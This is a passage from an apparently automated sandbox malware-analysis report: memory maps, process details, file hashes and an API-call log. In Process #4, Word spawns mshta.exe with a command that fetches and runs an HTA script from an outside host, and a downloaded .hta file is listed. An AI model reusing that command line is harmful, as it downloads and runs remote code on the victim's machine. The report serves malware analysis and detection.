kernelbase.dll 0x7fefd9d0000 0x7fefda3afff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefdb40000 0x7fefdb6dfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefdd50000 0x7fefddeefff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7fefde70000 0x7fefdf46fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefdf50000 0x7fefdf5dfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7fefe1c0000 0x7fefe3c2fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefe550000 0x7fefe5e8fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7fefe640000 0x7fefe76cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7fefe770000 0x7fefe7e0fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefe850000 0x7feff5d7fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7feff710000 0x7feff818fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff8c0000 0x7feff8defff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7feff8e0000 0x7feff9bafff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7feff9d0000 0x7feffa36fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7feffa40000 0x7feffb08fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feffb20000 0x7feffb20fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd6fff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
Threads
Thread 0xba4
(Host: 2, Network: 0)
+
Category Operation Information Success Count Logfile
COM Create interface = 31BCFCE2-DAFB-11D2-9F81-00C04F79A0A3, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
COM Create interface = B81FF171-20F3-11D2-8DCC-00A0C9B00521, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Process #3: cvtres.exe
+
Information Value
ID #3
File Name c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe
Command Line C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" "c:\Users\aETAdzjz\Desktop\CSCED98.tmp"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:02, Reason: Child Process
Unmonitor End Time: 00:02:36, Reason: Terminated by Timeout
Monitor Duration 00:01:34
Remarks No high level activity detected in monitored regions
OS Process Information
+
Information Value
PID 0xbb8
Parent PID 0xba0 (c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010989 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BBC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable True False False
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory Readable, Writable True True False
cvtres.exe 0x00400000 0x0040cfff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000410000 0x00410000 0x0050ffff Private Memory Readable, Writable True True False
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True True False
private_0x0000000000550000 0x00550000 0x0055ffff Private Memory Readable, Writable True True False
msvcr80.dll 0x75360000 0x75428fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x776e0000 0x777fefff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
kernelbase.dll 0x7fefd9d0000 0x7fefda3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefdd50000 0x7fefddeefff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7fefe640000 0x7fefe76cfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff8c0000 0x7feff8defff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7feff8e0000 0x7feff9bafff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feffb20000 0x7feffb20fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd4fff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
Process #4: mshta.exe
(Host: 590, Network: 0)
+
Information Value
ID #4
File Name c:\windows\system32\mshta.exe
Command Line "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:02, Reason: Child Process
Unmonitor End Time: 00:02:36, Reason: Terminated by Timeout
Monitor Duration 00:01:34
OS Process Information
+
Information Value
PID 0xbc0
Parent PID 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010989 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BC4
0x BD8
0x BE0
0x BE4
0x BE8
0x BFC
0x 784
0x 82C
0x 84C
0x 878
0x 308
0x 6B4
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
imm32.dll 0x000c0000 0x000e8fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable, Writable True False False
mshta.exe.mui 0x000d0000 0x000d0fff Memory Mapped File Readable, Writable False False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False
rpcss.dll 0x00120000 0x0019cfff Memory Mapped File Readable False False False
rpcss.dll 0x00120000 0x0019cfff Memory Mapped File Readable False False False
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable, Writable True False False
index.dat 0x00130000 0x0013bfff Memory Mapped File Readable, Writable True False False
index.dat 0x00140000 0x00147fff Memory Mapped File Readable, Writable True False False
index.dat 0x00150000 0x0015ffff Memory Mapped File Readable, Writable True False False
index.dat 0x00160000 0x0019ffff Memory Mapped File Readable, Writable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False
private_0x00000000001b0000 0x001b0000 0x002affff Private Memory Readable, Writable True False False
pagefile_0x00000000002b0000 0x002b0000 0x002b0fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002e0000 0x002e0000 0x002e1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002f0000 0x002f0000 0x002f1fff Pagefile Backed Memory Readable True False False
private_0x0000000000300000 0x00300000 0x00300fff Private Memory Readable, Writable True True False
pagefile_0x0000000000300000 0x00300000 0x00300fff Pagefile Backed Memory Readable True False False
private_0x0000000000310000 0x00310000 0x0036ffff Private Memory Readable, Writable True True False
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False
oleaccrc.dll 0x00350000 0x00350fff Memory Mapped File Readable False False False
private_0x0000000000360000 0x00360000 0x0036ffff Private Memory Readable, Writable True False False
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory Readable, Writable True False False
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000570000 0x00570000 0x00570fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000570000 0x00570000 0x00571fff Pagefile Backed Memory Readable True False False
private_0x00000000005d0000 0x005d0000 0x005dffff Private Memory Readable, Writable True False False
pagefile_0x00000000005e0000 0x005e0000 0x006befff Pagefile Backed Memory Readable True False False
private_0x00000000006d0000 0x006d0000 0x006dffff Private Memory Readable, Writable True False False
private_0x00000000006e0000 0x006e0000 0x007dffff Private Memory Readable, Writable True False False
pagefile_0x00000000007e0000 0x007e0000 0x00967fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000970000 0x00970000 0x00af0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000b00000 0x00b00000 0x01efffff Pagefile Backed Memory Readable True False False
private_0x0000000001f00000 0x01f00000 0x01ffffff Private Memory Readable, Writable True True False
private_0x0000000001f00000 0x01f00000 0x01f7ffff Private Memory Readable, Writable True True False
private_0x0000000001ff0000 0x01ff0000 0x01ffffff Private Memory Readable, Writable True False False
private_0x00000000020a0000 0x020a0000 0x0219ffff Private Memory Readable, Writable True False False
private_0x00000000021a0000 0x021a0000 0x0238ffff Private Memory Readable, Writable True True False
private_0x00000000021d0000 0x021d0000 0x022cffff Private Memory Readable, Writable True False False
private_0x0000000002310000 0x02310000 0x0238ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x02390000 0x0265efff Memory Mapped File Readable False False False
pagefile_0x0000000002660000 0x02660000 0x029a2fff Pagefile Backed Memory Readable True False False
private_0x00000000029b0000 0x029b0000 0x02bcffff Private Memory Readable, Writable True True False
private_0x0000000002a20000 0x02a20000 0x02b1ffff Private Memory Readable, Writable True False False
private_0x0000000002b50000 0x02b50000 0x02bcffff Private Memory Readable, Writable True False False
private_0x0000000002bd0000 0x02bd0000 0x02dcffff Private Memory Readable, Writable True True False
private_0x0000000002c60000 0x02c60000 0x02cdffff Private Memory Readable, Writable True False False
private_0x0000000002d50000 0x02d50000 0x02dcffff Private Memory Readable, Writable True False False
private_0x0000000002e70000 0x02e70000 0x02f6ffff Private Memory Readable, Writable True False False
private_0x0000000002f70000 0x02f70000 0x0306ffff Private Memory Readable, Writable True False False
private_0x0000000003080000 0x03080000 0x0317ffff Private Memory Readable, Writable True False False
private_0x00000000031c0000 0x031c0000 0x032bffff Private Memory Readable, Writable True False False
private_0x0000000003300000 0x03300000 0x033fffff Private Memory Readable, Writable True False False
private_0x0000000003580000 0x03580000 0x0367ffff Private Memory Readable, Writable True False False
private_0x0000000003690000 0x03690000 0x0378ffff Private Memory Readable, Writable True False False
user32.dll 0x775e0000 0x776d9fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x776e0000 0x777fefff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x779c0000 0x779c2fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x779d0000 0x779d6fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
mshta.exe 0xff9d0000 0xff9dffff Memory Mapped File Readable, Writable, Executable True False False
mshtml.dll 0x7fee0880000 0x7fee1117fff Memory Mapped File Readable, Writable, Executable True False False
oleacc.dll 0x7fef22f0000 0x7fef2343fff Memory Mapped File Readable, Writable, Executable False False False
ieframe.dll 0x7fef2350000 0x7fef2f06fff Memory Mapped File Readable, Writable, Executable False False False
msimtf.dll 0x7fef3140000 0x7fef314dfff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x7fef3160000 0x7fef317bfff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x7fef3180000 0x7fef31e1fff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x7fef3c70000 0x7fef3c7bfff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x7fef46d0000 0x7fef46d7fff Memory Mapped File Readable, Writable, Executable False False False
msls31.dll 0x7fef6080000 0x7fef60bafff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x7fef6630000 0x7fef6638fff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x7fef6660000 0x7fef66d3fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x7fefadc0000 0x7fefadd0fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x7fefaf90000 0x7fefaf9afff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x7fefafa0000 0x7fefafb8fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x7fefafc0000 0x7fefafd4fff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x7fefb180000 0x7fefb197fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x7fefb560000 0x7fefb5b5fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x7fefbc30000 0x7fefbc47fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc6.dll 0x7fefbc50000 0x7fefbc60fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x7fefbc80000 0x7fefbcd2fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x7fefbdd0000 0x7fefbddafff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x7fefbde0000 0x7fefbe06fff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x7fefbf70000 0x7fefbf84fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x7fefc060000 0x7fefc253fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x7fefc740000 0x7fefc76cfff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc910000 0x7fefc91bfff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x7fefc9e0000 0x7fefc9e6fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefcd40000 0x7fefcd86fff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x7fefce60000 0x7fefcebafff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x7fefcfd0000 0x7fefcfd6fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x7fefcfe0000 0x7fefd034fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefd040000 0x7fefd056fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x7fefd610000 0x7fefd634fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefd640000 0x7fefd64efff Memory Mapped File Readable, Writable, Executable False False False
sxs.dll 0x7fefd650000 0x7fefd6e0fff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x7fefd730000 0x7fefd743fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x7fefd750000 0x7fefd75efff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x7fefd7f0000 0x7fefd7fefff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x7fefd840000 0x7fefd9a6fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd9d0000 0x7fefda3afff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefdb40000 0x7fefdb6dfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefdd50000 0x7fefddeefff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7fefde70000 0x7fefdf46fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefdf50000 0x7fefdf5dfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x7fefdf60000 0x7fefe1b8fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7fefe1c0000 0x7fefe3c2fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x7fefe3d0000 0x7fefe547fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefe550000 0x7fefe5e8fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x7fefe5f0000 0x7fefe63cfff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7fefe640000 0x7fefe76cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7fefe770000 0x7fefe7e0fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x7fefe7f0000 0x7fefe841fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefe850000 0x7feff5d7fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x7feff5e0000 0x7feff709fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7feff710000 0x7feff818fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff8c0000 0x7feff8defff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7feff8e0000 0x7feff9bafff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x7feff9c0000 0x7feff9c7fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7feff9d0000 0x7feffa36fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7feffa40000 0x7feffb08fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feffb20000 0x7feffb20fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007fffffa6000 0x7fffffa6000 0x7fffffa7fff Private Memory Readable, Writable True False False
private_0x000007fffffa8000 0x7fffffa8000 0x7fffffa9fff Private Memory Readable, Writable True False False
private_0x000007fffffaa000 0x7fffffaa000 0x7fffffabfff Private Memory Readable, Writable True False False
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True False False
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd5fff Private Memory Readable, Writable True False False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True False False
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True False False
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True False False
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory Readable, Writable True False False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False
For performance reasons, the remaining 23 entries are omitted.
The remaining entries can be found in flog.txt.
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\t[2].hta 3.24 KB (3313 bytes) MD5: 13b131d98fea2526196b20496ec68b0a
SHA1: 1284d7400f30f5a2c409f3f53fcf34b30c32268d
SHA256: ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75
False
Threads
Thread 0xbc4
(Host: 327, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2017-10-24 17:37:59 (UTC) True 1
Fn
System Get Time type = Ticks, time = 127203 True 1
Fn
Module Get Handle module_name = c:\windows\system32\mshta.exe, base_address = 0xff9d0000 True 1
Fn
System Get Info type = Operating System False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x776fc4a0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\System32\mshtml.dll, type = REG_SZ True 1
Fn
Module Load module_name = C:\Windows\System32\mshtml.dll, base_address = 0x7fee0880000 True 1
Fn
System Get Time type = System Time, time = 2017-10-24 17:37:59 (UTC) True 1
Fn
System Get Time type = Ticks, time = 127546 True 1
Fn
System Get Info type = Operating System False 1
Fn
Module Get Filename process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS False 1
Fn
